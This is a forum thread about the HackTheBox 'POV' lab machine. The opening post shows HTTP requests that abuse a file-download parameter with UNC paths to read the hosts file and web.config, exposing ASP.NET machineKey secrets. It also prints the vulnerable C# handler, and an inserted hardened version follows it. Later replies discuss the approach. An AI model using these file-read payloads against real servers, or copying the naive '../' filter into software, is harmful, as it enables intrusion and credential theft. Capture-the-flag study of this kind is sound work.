Jan 27, 2024, 10:29 AM
Welcome to POV - HTB
Medium box released 27 Jan 2024
POV - HTB
by Art10n - Saturday January 27, 2024 at 10:29 AM
[code]
POST /portfolio/ HTTP/1.1
Host: dev.pov.htb
...
file=\\127.0.0.1\C$\Windows\System32\drivers\etc\hosts
---
# localhost name resolution is handled within DNS itself.
#	127.0.0.1 localhost
#	::1 localhost
127.0.0.1 pov.htb dev.pov.htb
[/code]
[code]
file=\\127.0.0.1\C$\inetpub\wwwroot\dev\web.config
---
<configuration>
  <system.web>
    <customErrors mode="On" defaultRedirect="default.aspx" />
    <httpRuntime targetFramework="4.5" />
    <machineKey decryption="AES" decryptionKey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" validation="SHA1" validationKey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" />
  </system.web>
  <system.webServer>
    <httpErrors>
      <remove statusCode="403" subStatusCode="-1" />
      <error statusCode="403" prefixLanguageFilePath="" path="http://dev.pov.htb:8080/portfolio" responseMode="Redirect" />
    </httpErrors>
    <httpRedirect enabled="true" destination="http://dev.pov.htb/portfolio" exactDestination="false" childOnly="true" />
  </system.webServer>
</configuration>
[/code]
index.aspx.cs
[code]
using System;
using System.Collections.Generic;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
using System.Text.RegularExpressions;
using System.Text;
using System.IO;
using System.Net;

public partial class index : System.Web.UI.Page
{
    protected void Page_Load(object sender, EventArgs e)
    {
    }

    protected void Download(object sender, EventArgs e)
    {
        var filePath = file.Value;
        filePath = Regex.Replace(filePath, "../", "");
        Response.ContentType = "application/octet-stream";
        Response.AppendHeader("Content-Disposition","attachment; filename=" + filePath);
        Response.TransmitFile(filePath);
        Response.End();
    }
}
[/code]
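Added example (not part of the original post or the box's code): a hardened counterpart to the `Download` handler above, which canonicalises the requested name against a fixed base directory and checks containment instead of stripping substrings. `SafeDownload`, `TryResolve` and the `portfolio-files` directory are hypothetical names, the sample file is constructed, and Windows path semantics are assumed.

```csharp
using System;
using System.IO;

public static class SafeDownload
{
    // True only when `requested` names an existing file inside `baseDir`.
    public static bool TryResolve(string baseDir, string requested, out string fullPath)
    {
        fullPath = null;
        if (string.IsNullOrWhiteSpace(requested)) return false;
        // Reject rooted, UNC and drive- or stream-qualified input instead of stripping substrings.
        if (Path.IsPathRooted(requested) || requested.IndexOf(':') >= 0) return false;

        string root = Path.GetFullPath(baseDir);
        if (!root.EndsWith(Path.DirectorySeparatorChar.ToString()))
            root += Path.DirectorySeparatorChar;

        // Canonicalise first, then check containment on the resolved path.
        string candidate;
        try { candidate = Path.GetFullPath(Path.Combine(root, requested)); }
        catch (Exception) { return false; } // illegal characters, over-long path

        if (!candidate.StartsWith(root, StringComparison.OrdinalIgnoreCase)) return false;
        if (!File.Exists(candidate)) return false;
        fullPath = candidate;
        return true;
    }

    public static void Main()
    {
        // Constructed sample directory and file (hypothetical names).
        string baseDir = Path.Combine(Path.GetTempPath(), "portfolio-files");
        Directory.CreateDirectory(baseDir);
        File.WriteAllText(Path.Combine(baseDir, "cv.pdf"), "constructed sample");

        string[] inputs = {
            "cv.pdf",
            @"\\127.0.0.1\C$\Windows\System32\drivers\etc\hosts", // value from the post
            @"..\web.config",                                      // constructed
            @"C:\inetpub\wwwroot\dev\web.config"                   // constructed local form
        };
        foreach (string input in inputs)
        {
            string resolved;
            bool ok = TryResolve(baseDir, input, out resolved);
            Console.WriteLine("{0} -> {1}", input, ok ? "serve " + resolved : "reject");
        }
    }
}
```

In the code-behind, `Response.TransmitFile` would receive `fullPath` only when `TryResolve` returns true, with `Path.GetFileName(fullPath)` used for the `Content-Disposition` filename.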
Jan 29, 2024, 01:33 PM
[quote="Art10n" pid='383286' dateline='1706384075']
POST /portfolio/ HTTP/1.1
Host: dev.pov.htb
...
file=\\127.0.0.1\C$\Windows\System32\drivers\etc\hosts
---
# localhost name resolution is handled within DNS itself.
#	127.0.0.1 localhost
#	::1 localhost
127.0.0.1 pov.htb dev.pov.htb
file=\\127.0.0.1\C$\inetpub\wwwroot\dev\web.config
index.aspx.cs
[/quote]
How did you know what files to look for? Like the dev folder inside wwwroot? Does it have something to do with the subdomain?
Feb 21, 2024, 08:15 PM
The deserialization is insane.
Feb 24, 2024, 07:09 PM
Interesting information to help solve the box
Feb 25, 2024, 11:01 AM
good solution to fix